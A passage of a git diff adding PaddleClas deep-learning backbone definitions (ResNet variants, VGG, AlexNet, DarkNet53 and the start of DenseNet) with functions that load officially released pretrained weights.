        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `ResNet18_vd` model depends on args.
    """
    model = ResNet(config=NET_CONFIG["18"], version="vd", **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["ResNet18_vd"], use_ssld)
    return model


def ResNet34(pretrained=False, use_ssld=False, **kwargs):
    """
    ResNet34
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `ResNet34` model depends on args.
    """
    model = ResNet(config=NET_CONFIG["34"], version="vb", **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["ResNet34"], use_ssld)
    return model


def ResNet34_vd(pretrained=False, use_ssld=False, **kwargs):
    """
    ResNet34_vd
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `ResNet34_vd` model depends on args.
    """
    model = ResNet(config=NET_CONFIG["34"], version="vd", **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["ResNet34_vd"], use_ssld)
    return model


def ResNet50(pretrained=False, use_ssld=False, **kwargs):
    """
    ResNet50
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `ResNet50` model depends on args.
    """
    model = ResNet(config=NET_CONFIG["50"], version="vb", **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["ResNet50"], use_ssld)
    return model


def ResNet50_vd(pretrained=False, use_ssld=False, **kwargs):
    """
    ResNet50_vd
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `ResNet50_vd` model depends on args.
    """
    model = ResNet(config=NET_CONFIG["50"], version="vd", **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["ResNet50_vd"], use_ssld)
    return model


def ResNet101(pretrained=False, use_ssld=False, **kwargs):
    """
    ResNet101
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `ResNet101` model depends on args.
    """
    model = ResNet(config=NET_CONFIG["101"], version="vb", **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["ResNet101"], use_ssld)
    return model


def ResNet101_vd(pretrained=False, use_ssld=False, **kwargs):
    """
    ResNet101_vd
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `ResNet101_vd` model depends on args.
    """
    model = ResNet(config=NET_CONFIG["101"], version="vd", **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["ResNet101_vd"], use_ssld)
    return model


def ResNet152(pretrained=False, use_ssld=False, **kwargs):
    """
    ResNet152
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `ResNet152` model depends on args.
    """
    model = ResNet(config=NET_CONFIG["152"], version="vb", **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["ResNet152"], use_ssld)
    return model


def ResNet152_vd(pretrained=False, use_ssld=False, **kwargs):
    """
    ResNet152_vd
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `ResNet152_vd` model depends on args.
    """
    model = ResNet(config=NET_CONFIG["152"], version="vd", **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["ResNet152_vd"], use_ssld)
    return model


def ResNet200_vd(pretrained=False, use_ssld=False, **kwargs):
    """
    ResNet200_vd
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `ResNet200_vd` model depends on args.
    """
    model = ResNet(config=NET_CONFIG["200"], version="vd", **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["ResNet200_vd"], use_ssld)
    return model
diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/vgg.py b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/vgg.py
new file mode 100644
index 0000000..9b1750d
--- /dev/null
+++ b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/vgg.py
@@ -0,0 +1,231 @@
# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# VGG backbones (legendary_models/vgg.py).

from __future__ import absolute_import, division, print_function

import paddle.nn as nn
from paddle.nn import Conv2D, BatchNorm, Linear, Dropout
from paddle.nn import MaxPool2D

from ppcls.arch.backbone.base.theseus_layer import TheseusLayer
from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url

# Download URLs for the officially released pretrained weights.
MODEL_URLS = {
    "VGG11":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/VGG11_pretrained.pdparams",
    "VGG13":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/VGG13_pretrained.pdparams",
    "VGG16":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/VGG16_pretrained.pdparams",
    "VGG19":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/VGG19_pretrained.pdparams",
}
# NOTE(review): dict_keys view, not a list — see the same pattern in resnet.py.
__all__ = MODEL_URLS.keys()

# VGG config
# key: VGG network depth
# value: conv num in different blocks
NET_CONFIG = {
    11: [1, 1, 2, 2, 2],
    13: [2, 2, 2, 2, 2],
    16: [2, 2, 3, 3, 3],
    19: [2, 2, 4, 4, 4]
}


class ConvBlock(TheseusLayer):
    """A VGG stage: `groups` (1-4) 3x3 conv+ReLU layers followed by a
    2x2 max-pool. Only conv1..conv`groups` are created and used."""

    def __init__(self, input_channels, output_channels, groups):
        super().__init__()

        self.groups = groups
        self.conv1 = Conv2D(
            in_channels=input_channels,
            out_channels=output_channels,
            kernel_size=3,
            stride=1,
            padding=1,
            bias_attr=False)
        if groups == 2 or groups == 3 or groups == 4:
            self.conv2 = Conv2D(
                in_channels=output_channels,
                out_channels=output_channels,
                kernel_size=3,
                stride=1,
                padding=1,
                bias_attr=False)
        if groups == 3 or groups == 4:
            self.conv3 = Conv2D(
                in_channels=output_channels,
                out_channels=output_channels,
                kernel_size=3,
                stride=1,
                padding=1,
                bias_attr=False)
        if groups == 4:
            self.conv4 = Conv2D(
                in_channels=output_channels,
                out_channels=output_channels,
                kernel_size=3,
                stride=1,
                padding=1,
                bias_attr=False)

        self.max_pool = MaxPool2D(kernel_size=2, stride=2, padding=0)
        self.relu = nn.ReLU()

    def forward(self, inputs):
        x = self.conv1(inputs)
        x = self.relu(x)
        if self.groups == 2 or self.groups == 3 or self.groups == 4:
            x = self.conv2(x)
            x = self.relu(x)
        if self.groups == 3 or self.groups == 4:
            x = self.conv3(x)
            x = self.relu(x)
        if self.groups == 4:
            x = self.conv4(x)
            x = self.relu(x)
        x = self.max_pool(x)
        return x


class VGGNet(TheseusLayer):
    """
    VGGNet
    Args:
        config: list. VGGNet config.
        stop_grad_layers: int=0. The parameters in blocks which index larger than `stop_grad_layers`, will be set `param.trainable=False`
        class_num: int=1000. The number of classes.
    Returns:
        model: nn.Layer. Specific VGG model depends on args.
    """

    def __init__(self, config, stop_grad_layers=0, class_num=1000, return_patterns=None):
        super().__init__()

        self.stop_grad_layers = stop_grad_layers

        self.conv_block_1 = ConvBlock(3, 64, config[0])
        self.conv_block_2 = ConvBlock(64, 128, config[1])
        self.conv_block_3 = ConvBlock(128, 256, config[2])
        self.conv_block_4 = ConvBlock(256, 512, config[3])
        self.conv_block_5 = ConvBlock(512, 512, config[4])

        self.relu = nn.ReLU()
        self.flatten = nn.Flatten(start_axis=1, stop_axis=-1)

        # Freeze the first `stop_grad_layers` conv blocks.
        for idx, block in enumerate([
                self.conv_block_1, self.conv_block_2, self.conv_block_3,
                self.conv_block_4, self.conv_block_5
        ]):
            if self.stop_grad_layers >= idx + 1:
                for param in block.parameters():
                    param.trainable = False

        self.drop = Dropout(p=0.5, mode="downscale_in_infer")
        # 7*7*512 assumes a 224x224 input downsampled by the 5 pool layers.
        self.fc1 = Linear(7 * 7 * 512, 4096)
        self.fc2 = Linear(4096, 4096)
        self.fc3 = Linear(4096, class_num)
        if return_patterns is not None:
            self.update_res(return_patterns)
            self.register_forward_post_hook(self._return_dict_hook)

    def forward(self, inputs):
        x = self.conv_block_1(inputs)
        x = self.conv_block_2(x)
        x = self.conv_block_3(x)
        x = self.conv_block_4(x)
        x = self.conv_block_5(x)
        x = self.flatten(x)
        x = self.fc1(x)
        x = self.relu(x)
        x = self.drop(x)
        x = self.fc2(x)
        x = self.relu(x)
        x = self.drop(x)
        x = self.fc3(x)
        return x


def _load_pretrained(pretrained, model, model_url, use_ssld):
    # pretrained semantics: False -> leave weights as-is; True -> download
    # from `model_url`; str -> load from a local checkpoint path.
    if pretrained is False:
        pass
    elif pretrained is True:
        load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld)
    elif isinstance(pretrained, str):
        load_dygraph_pretrain(model, pretrained)
    else:
        raise RuntimeError(
            "pretrained type is not available. Please use `string` or `boolean` type."
        )


def VGG11(pretrained=False, use_ssld=False, **kwargs):
    """
    VGG11
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `VGG11` model depends on args.
    """
    model = VGGNet(config=NET_CONFIG[11], **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["VGG11"], use_ssld)
    return model


def VGG13(pretrained=False, use_ssld=False, **kwargs):
    """
    VGG13
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `VGG13` model depends on args.
    """
    model = VGGNet(config=NET_CONFIG[13], **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["VGG13"], use_ssld)
    return model


def VGG16(pretrained=False, use_ssld=False, **kwargs):
    """
    VGG16
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `VGG16` model depends on args.
    """
    model = VGGNet(config=NET_CONFIG[16], **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["VGG16"], use_ssld)
    return model


def VGG19(pretrained=False, use_ssld=False, **kwargs):
    """
    VGG19
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `VGG19` model depends on args.
    """
    model = VGGNet(config=NET_CONFIG[19], **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["VGG19"], use_ssld)
    return model
diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/__init__.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/alexnet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/alexnet.py
new file mode 100644
index 0000000..b44901a
--- /dev/null
+++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/alexnet.py
@@ -0,0 +1,168 @@
# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# AlexNet backbone (model_zoo/alexnet.py).

import paddle
from paddle import ParamAttr
import paddle.nn as nn
import paddle.nn.functional as F
from paddle.nn import Conv2D, BatchNorm, Linear, Dropout, ReLU
from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D
from paddle.nn.initializer import Uniform
import math

from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url

MODEL_URLS = {
    "AlexNet":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/AlexNet_pretrained.pdparams"
}

__all__ = list(MODEL_URLS.keys())


class ConvPoolLayer(nn.Layer):
    """Conv2D (+ optional ReLU) followed by a 3x3 stride-2 max-pool.
    `stdv` sets the Uniform(-stdv, stdv) init range for weights and bias."""

    def __init__(self,
                 input_channels,
                 output_channels,
                 filter_size,
                 stride,
                 padding,
                 stdv,
                 groups=1,
                 act=None,
                 name=None):
        super(ConvPoolLayer, self).__init__()

        # Only "relu" activates; any other value means no activation.
        self.relu = ReLU() if act == "relu" else None

        self._conv = Conv2D(
            in_channels=input_channels,
            out_channels=output_channels,
            kernel_size=filter_size,
            stride=stride,
            padding=padding,
            groups=groups,
            weight_attr=ParamAttr(
                name=name + "_weights", initializer=Uniform(-stdv, stdv)),
            bias_attr=ParamAttr(
                name=name + "_offset", initializer=Uniform(-stdv, stdv)))
        self._pool = MaxPool2D(kernel_size=3, stride=2, padding=0)

    def forward(self, inputs):
        x = self._conv(inputs)
        if self.relu is not None:
            x = self.relu(x)
        x = self._pool(x)
        return x


class AlexNetDY(nn.Layer):
    """AlexNet: five conv layers (pooling after 1, 2 and 5) and three FC
    layers with dropout. Each layer's init stdv is 1/sqrt(fan_in)."""

    def __init__(self, class_num=1000):
        super(AlexNetDY, self).__init__()

        stdv = 1.0 / math.sqrt(3 * 11 * 11)
        self._conv1 = ConvPoolLayer(
            3, 64, 11, 4, 2, stdv, act="relu", name="conv1")
        stdv = 1.0 / math.sqrt(64 * 5 * 5)
        self._conv2 = ConvPoolLayer(
            64, 192, 5, 1, 2, stdv, act="relu", name="conv2")
        stdv = 1.0 / math.sqrt(192 * 3 * 3)
        # conv3/conv4 have no pooling, so they are plain Conv2D layers;
        # their ReLU is applied functionally in forward().
        self._conv3 = Conv2D(
            192,
            384,
            3,
            stride=1,
            padding=1,
            weight_attr=ParamAttr(
                name="conv3_weights", initializer=Uniform(-stdv, stdv)),
            bias_attr=ParamAttr(
                name="conv3_offset", initializer=Uniform(-stdv, stdv)))
        stdv = 1.0 / math.sqrt(384 * 3 * 3)
        self._conv4 = Conv2D(
            384,
            256,
            3,
            stride=1,
            padding=1,
            weight_attr=ParamAttr(
                name="conv4_weights", initializer=Uniform(-stdv, stdv)),
            bias_attr=ParamAttr(
                name="conv4_offset", initializer=Uniform(-stdv, stdv)))
        stdv = 1.0 / math.sqrt(256 * 3 * 3)
        self._conv5 = ConvPoolLayer(
            256, 256, 3, 1, 1, stdv, act="relu", name="conv5")
        # 256*6*6 assumes a 224x224 input; this stdv is reused for fc6-fc8.
        stdv = 1.0 / math.sqrt(256 * 6 * 6)

        self._drop1 = Dropout(p=0.5, mode="downscale_in_infer")
        self._fc6 = Linear(
            in_features=256 * 6 * 6,
            out_features=4096,
            weight_attr=ParamAttr(
                name="fc6_weights", initializer=Uniform(-stdv, stdv)),
            bias_attr=ParamAttr(
                name="fc6_offset", initializer=Uniform(-stdv, stdv)))

        self._drop2 = Dropout(p=0.5, mode="downscale_in_infer")
        self._fc7 = Linear(
            in_features=4096,
            out_features=4096,
            weight_attr=ParamAttr(
                name="fc7_weights", initializer=Uniform(-stdv, stdv)),
            bias_attr=ParamAttr(
                name="fc7_offset", initializer=Uniform(-stdv, stdv)))
        self._fc8 = Linear(
            in_features=4096,
            out_features=class_num,
            weight_attr=ParamAttr(
                name="fc8_weights", initializer=Uniform(-stdv, stdv)),
            bias_attr=ParamAttr(
                name="fc8_offset", initializer=Uniform(-stdv, stdv)))

    def forward(self, inputs):
        x = self._conv1(inputs)
        x = self._conv2(x)
        x = self._conv3(x)
        x = F.relu(x)
        x = self._conv4(x)
        x = F.relu(x)
        x = self._conv5(x)
        x = paddle.flatten(x, start_axis=1, stop_axis=-1)
        x = self._drop1(x)
        x = self._fc6(x)
        x = F.relu(x)
        x = self._drop2(x)
        x = self._fc7(x)
        x = F.relu(x)
        x = self._fc8(x)
        return x


def _load_pretrained(pretrained, model, model_url, use_ssld=False):
    # pretrained semantics: False -> leave weights as-is; True -> download
    # from `model_url`; str -> load from a local checkpoint path.
    if pretrained is False:
        pass
    elif pretrained is True:
        load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld)
    elif isinstance(pretrained, str):
        load_dygraph_pretrain(model, pretrained)
    else:
        raise RuntimeError(
            "pretrained type is not available. Please use `string` or `boolean` type."
        )


def AlexNet(pretrained=False, use_ssld=False, **kwargs):
    model = AlexNetDY(**kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["AlexNet"], use_ssld=use_ssld)
    return model
diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/darknet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/darknet.py
new file mode 100644
index 0000000..75aafd8
--- /dev/null
+++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/darknet.py
@@ -0,0 +1,197 @@
# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
+ +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "DarkNet53": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DarkNet53_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + input_channels, + output_channels, + filter_size, + stride, + padding, + name=None): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=input_channels, + out_channels=output_channels, + kernel_size=filter_size, + stride=stride, + padding=padding, + weight_attr=ParamAttr(name=name + ".conv.weights"), + bias_attr=False) + + bn_name = name + ".bn" + self._bn = BatchNorm( + num_channels=output_channels, + act="relu", + param_attr=ParamAttr(name=bn_name + ".scale"), + bias_attr=ParamAttr(name=bn_name + ".offset"), + moving_mean_name=bn_name + ".mean", + moving_variance_name=bn_name + ".var") + + def forward(self, inputs): + x = self._conv(inputs) + x = self._bn(x) + return x + + +class BasicBlock(nn.Layer): + def __init__(self, input_channels, output_channels, name=None): + super(BasicBlock, self).__init__() + + self._conv1 = ConvBNLayer( + input_channels, output_channels, 1, 1, 0, name=name + ".0") + self._conv2 = ConvBNLayer( + output_channels, output_channels * 2, 3, 1, 1, name=name + ".1") + + def forward(self, inputs): + x = self._conv1(inputs) + x = self._conv2(x) + return paddle.add(x=inputs, y=x) + + +class DarkNet(nn.Layer): + def __init__(self, class_num=1000): + super(DarkNet, self).__init__() + + self.stages = [1, 2, 8, 8, 4] + self._conv1 = ConvBNLayer(3, 32, 3, 1, 1, name="yolo_input") + self._conv2 = ConvBNLayer( + 32, 64, 3, 2, 1, 
name="yolo_input.downsample") + + self._basic_block_01 = BasicBlock(64, 32, name="stage.0.0") + self._downsample_0 = ConvBNLayer( + 64, 128, 3, 2, 1, name="stage.0.downsample") + + self._basic_block_11 = BasicBlock(128, 64, name="stage.1.0") + self._basic_block_12 = BasicBlock(128, 64, name="stage.1.1") + self._downsample_1 = ConvBNLayer( + 128, 256, 3, 2, 1, name="stage.1.downsample") + + self._basic_block_21 = BasicBlock(256, 128, name="stage.2.0") + self._basic_block_22 = BasicBlock(256, 128, name="stage.2.1") + self._basic_block_23 = BasicBlock(256, 128, name="stage.2.2") + self._basic_block_24 = BasicBlock(256, 128, name="stage.2.3") + self._basic_block_25 = BasicBlock(256, 128, name="stage.2.4") + self._basic_block_26 = BasicBlock(256, 128, name="stage.2.5") + self._basic_block_27 = BasicBlock(256, 128, name="stage.2.6") + self._basic_block_28 = BasicBlock(256, 128, name="stage.2.7") + self._downsample_2 = ConvBNLayer( + 256, 512, 3, 2, 1, name="stage.2.downsample") + + self._basic_block_31 = BasicBlock(512, 256, name="stage.3.0") + self._basic_block_32 = BasicBlock(512, 256, name="stage.3.1") + self._basic_block_33 = BasicBlock(512, 256, name="stage.3.2") + self._basic_block_34 = BasicBlock(512, 256, name="stage.3.3") + self._basic_block_35 = BasicBlock(512, 256, name="stage.3.4") + self._basic_block_36 = BasicBlock(512, 256, name="stage.3.5") + self._basic_block_37 = BasicBlock(512, 256, name="stage.3.6") + self._basic_block_38 = BasicBlock(512, 256, name="stage.3.7") + self._downsample_3 = ConvBNLayer( + 512, 1024, 3, 2, 1, name="stage.3.downsample") + + self._basic_block_41 = BasicBlock(1024, 512, name="stage.4.0") + self._basic_block_42 = BasicBlock(1024, 512, name="stage.4.1") + self._basic_block_43 = BasicBlock(1024, 512, name="stage.4.2") + self._basic_block_44 = BasicBlock(1024, 512, name="stage.4.3") + + self._pool = AdaptiveAvgPool2D(1) + + stdv = 1.0 / math.sqrt(1024.0) + self._out = Linear( + 1024, + class_num, + weight_attr=ParamAttr( + 
name="fc_weights", initializer=Uniform(-stdv, stdv)), + bias_attr=ParamAttr(name="fc_offset")) + + def forward(self, inputs): + x = self._conv1(inputs) + x = self._conv2(x) + + x = self._basic_block_01(x) + x = self._downsample_0(x) + + x = self._basic_block_11(x) + x = self._basic_block_12(x) + x = self._downsample_1(x) + + x = self._basic_block_21(x) + x = self._basic_block_22(x) + x = self._basic_block_23(x) + x = self._basic_block_24(x) + x = self._basic_block_25(x) + x = self._basic_block_26(x) + x = self._basic_block_27(x) + x = self._basic_block_28(x) + x = self._downsample_2(x) + + x = self._basic_block_31(x) + x = self._basic_block_32(x) + x = self._basic_block_33(x) + x = self._basic_block_34(x) + x = self._basic_block_35(x) + x = self._basic_block_36(x) + x = self._basic_block_37(x) + x = self._basic_block_38(x) + x = self._downsample_3(x) + + x = self._basic_block_41(x) + x = self._basic_block_42(x) + x = self._basic_block_43(x) + x = self._basic_block_44(x) + + x = self._pool(x) + x = paddle.squeeze(x, axis=[2, 3]) + x = self._out(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." 
+ ) + + +def DarkNet53(pretrained=False, use_ssld=False, **kwargs): + model = DarkNet(**kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["DarkNet53"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/densenet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/densenet.py new file mode 100644 index 0000000..7e6e202 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/densenet.py @@ -0,0 +1,344 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "DenseNet121": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DenseNet121_pretrained.pdparams", + "DenseNet161": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DenseNet161_pretrained.pdparams", + "DenseNet169": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DenseNet169_pretrained.pdparams", + "DenseNet201": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DenseNet201_pretrained.pdparams", + "DenseNet264": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DenseNet264_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class BNACConvLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + pad=0, + groups=1, + act="relu", + name=None): + super(BNACConvLayer, self).__init__() + + self._batch_norm = BatchNorm( + num_channels, + act=act, + param_attr=ParamAttr(name=name + '_bn_scale'), + bias_attr=ParamAttr(name + '_bn_offset'), + moving_mean_name=name + '_bn_mean', + moving_variance_name=name + '_bn_variance') + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=pad, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + + def forward(self, input): + y = self._batch_norm(input) + y = self._conv(y) + return y + + +class DenseLayer(nn.Layer): + def __init__(self, num_channels, growth_rate, bn_size, dropout, name=None): + super(DenseLayer, self).__init__() 
+ self.dropout = dropout + + self.bn_ac_func1 = BNACConvLayer( + num_channels=num_channels, + num_filters=bn_size * growth_rate, + filter_size=1, + pad=0, + stride=1, + name=name + "_x1") + + self.bn_ac_func2 = BNACConvLayer( + num_channels=bn_size * growth_rate, + num_filters=growth_rate, + filter_size=3, + pad=1, + stride=1, + name=name + "_x2") + + if dropout: + self.dropout_func = Dropout(p=dropout, mode="downscale_in_infer") + + def forward(self, input): + conv = self.bn_ac_func1(input) + conv = self.bn_ac_func2(conv) + if self.dropout: + conv = self.dropout_func(conv) + conv = paddle.concat([input, conv], axis=1) + return conv + + +class DenseBlock(nn.Layer): + def __init__(self, + num_channels, + num_layers, + bn_size, + growth_rate, + dropout, + name=None): + super(DenseBlock, self).__init__() + self.dropout = dropout + + self.dense_layer_func = [] + + pre_channel = num_channels + for layer in range(num_layers): + self.dense_layer_func.append( + self.add_sublayer( + "{}_{}".format(name, layer + 1), + DenseLayer( + num_channels=pre_channel, + growth_rate=growth_rate, + bn_size=bn_size, + dropout=dropout, + name=name + '_' + str(layer + 1)))) + pre_channel = pre_channel + growth_rate + + def forward(self, input): + conv = input + for func in self.dense_layer_func: + conv = func(conv) + return conv + + +class TransitionLayer(nn.Layer): + def __init__(self, num_channels, num_output_features, name=None): + super(TransitionLayer, self).__init__() + + self.conv_ac_func = BNACConvLayer( + num_channels=num_channels, + num_filters=num_output_features, + filter_size=1, + pad=0, + stride=1, + name=name) + + self.pool2d_avg = AvgPool2D(kernel_size=2, stride=2, padding=0) + + def forward(self, input): + y = self.conv_ac_func(input) + y = self.pool2d_avg(y) + return y + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + pad=0, + groups=1, + act="relu", + name=None): + super(ConvBNLayer, self).__init__() + + 
